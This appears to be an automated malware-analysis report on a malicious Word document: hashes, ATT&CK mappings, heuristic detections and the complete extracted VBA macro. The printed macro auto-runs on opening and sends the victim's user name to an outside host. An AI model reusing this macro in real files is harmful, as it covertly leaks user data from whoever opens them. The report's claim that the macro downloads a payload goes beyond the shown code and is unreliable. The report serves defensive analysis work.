Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ed2a56af1ae40110…

MALICIOUS

Office (OLE)

460.5 KB Created: 2017-07-19 09:42:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: 11cf2edb6a38f8c61ce64b3ba0a021f8 SHA-1: 538d62b3bf352d1ab6e1ec321eef7ebe26fc425a SHA-256: ed2a56af1ae401104a73ac4a7e7f33e206b517f15c1429e226715c66c216b967
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open subroutine that executes shell commands. This macro attempts to download a payload from the URL 'http://events.meinlbamk.com/login.php?input=' by concatenating it with the user's name. The presence of CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread API calls strongly suggests the execution of a secondary payload. The document body explicitly asks the user to enable macros for full viewing, a common social engineering tactic.

Heuristics 9

  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        strUrl = "http://events.meinlbamk.com/login.php?input=" & Application.UserName
        Set hReq = CreateObject("MSXML2.XMLHTTP")
            With hReq
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
        'oxFlMRrmjK
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://events.meinlbamk.com/login.php?input= In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 871 bytes
SHA-256: fa7feb388186d4a94bdee1eb5b3d5d4f17e1c3d1e3c53f02789cb059cf7cc3da
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    'oxFlMRrmjK
    Dim strUrl As String
    strUrl = "http://events.meinlbamk.com/login.php?input=" & Application.UserName
    Set hReq = CreateObject("MSXML2.XMLHTTP")
        With hReq
            .Open "GET", strUrl, False
            .Send
        End With
        
    If ThisDocument.ReadOnly = False Then
        ThisDocument.Save
    End If
End Sub

Sub oxFlMRrmjK()
    Dim sZpImFWCda As Document
    Set sZpImFWCda = ActiveDocument
    Dim ivOUIYFzPz As Variant
    sZpImFWCda.Sections.First.Range.Font.Hidden = True
End Sub